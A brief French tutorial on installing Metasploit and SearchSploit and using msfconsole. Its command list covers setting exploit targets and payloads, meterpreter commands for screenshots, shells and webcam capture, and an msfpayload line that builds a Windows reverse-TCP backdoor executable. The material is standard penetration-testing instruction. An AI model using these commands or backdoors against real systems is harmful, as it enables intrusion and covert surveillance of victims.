Découverte de l'outil metasploit

Installation générale de metasploit

# vraiment eu comme utilité libpq5 libpq-dev libsqlite3-dev
sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
cd /opt/
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

S'il y a des soucis de compilation de modules, il est très recommandé de regarder dans les log de compilation qui seront conseillé en fin de sortie de commande.

installation de SearchSploit

En seulement deux commandes :

git clone https://github.com/offensive-security/exploit-database.git /opt/exploit-database
ln -sf /opt/exploit-database/searchsploit /usr/local/bin/searchsploit

Il sera alors pas la suite possible de mettre à jours la base :

searchsploit -u

commandes disponibles

  • Se connecter à l'interface :
msfconsole
  • Mise à jour de la base :
msf update
  • Mode msf
show exploits
search name:smb type:exploit platform:windows
use <exploit>
set rhost 10.0.45.14
set rport 1234
  • Mode exploit
show payloads
set payload <payload>
set lhost <ip_machine>
set lport 4321
run
 
 
//use <multi/handler>
  • Mode Handler
exploit
  • Mode meterpreter
sysinfo
ps
screenshot
shell
webcam_list
webcam_snap
webcam_stream
shutdown

msfpayload

msfpayload <windows/meterpreter/reverse_tcp HOST=192.168.0.125 PORT=4444 x > /usr/backdoor.exe

Donc création du payload avant de lancer l'exploit